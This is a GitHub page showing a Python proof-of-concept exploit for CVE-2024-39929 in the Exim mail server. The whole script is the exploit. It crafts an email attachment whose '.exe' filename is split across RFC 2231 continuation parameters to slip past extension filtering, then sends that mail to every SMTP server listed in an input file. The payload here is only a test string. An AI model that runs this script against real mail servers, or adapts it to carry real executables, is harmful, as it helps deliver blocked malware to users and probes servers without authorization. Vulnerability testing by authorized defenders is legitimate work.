-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2024-39929_POC.py
81 lines (63 loc) · 2.87 KB
/
CVE-2024-39929_POC.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
# Exploit Title: Exim - CVE-2024-39929 - POC
# Date: 07/29/2024
# Exploit Author: Michael Fry
# Vendor Homepage: https://www.exim.org/
# Software Link: https://github.com/michael-david-fry/CVE-2024-39929
# Version: <= 4.97.1
# Tested on: Kali Linux
# CVE: CVE-2024-39929
import smtplib
import argparse
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
def send_exploit_email(smtp_server, smtp_port, sender_email, recipient_email):
try:
# Craft the payload for the vulnerability
payload = 'This is a CVE-2024-39929 test.'
# Create the email message with multiple parts
msg = MIMEMultipart()
msg['Subject'] = f'Exploit CVE-2024-39929 Test through {smtp_server}'
msg['From'] = sender_email
msg['To'] = recipient_email
# Add the main body of the email
body = MIMEText(payload, 'plain')
msg.attach(body)
# Create the crafted attachment
attachment = MIMEBase('application', 'octet-stream')
attachment.set_payload(payload)
encoders.encode_base64(attachment)
# Add the headers for the attachment to exploit the vulnerability
attachment.add_header('Content-Disposition', 'attachment; filename*0="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; filename*1="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; filename*2=".exe"')
msg.attach(attachment)
# Connect to the SMTP server
with smtplib.SMTP(smtp_server, smtp_port) as server:
server.set_debuglevel(1) # Enable debug output
# Send EHLO command
server.ehlo()
# Start TLS if supported
if server.has_extn('STARTTLS'):
server.starttls()
server.ehlo()
# Send the exploit email
server.sendmail(sender_email, [recipient_email], msg.as_string())
print(f"Exploit email sent to {smtp_server}")
except Exception as e:
print(f"Error sending email to {smtp_server}: {e}")
def read_servers_from_file(file_path):
with open(file_path, 'r') as file:
servers = [line.strip() for line in file if line.strip()]
return servers
def main():
parser = argparse.ArgumentParser(description="Send exploit email to a list of SMTP servers.")
parser.add_argument('file_path', help='Path to the file containing the list of SMTP servers')
args = parser.parse_args()
sender_email = input("Enter the sender email address: ")
recipient_email = input("Enter the recipient email address: ")
smtp_servers = read_servers_from_file(args.file_path)
for smtp_server in smtp_servers:
print(f"\nConnecting to {smtp_server}...")
send_exploit_email(smtp_server, 25, sender_email, recipient_email)
if __name__ == "__main__":
main()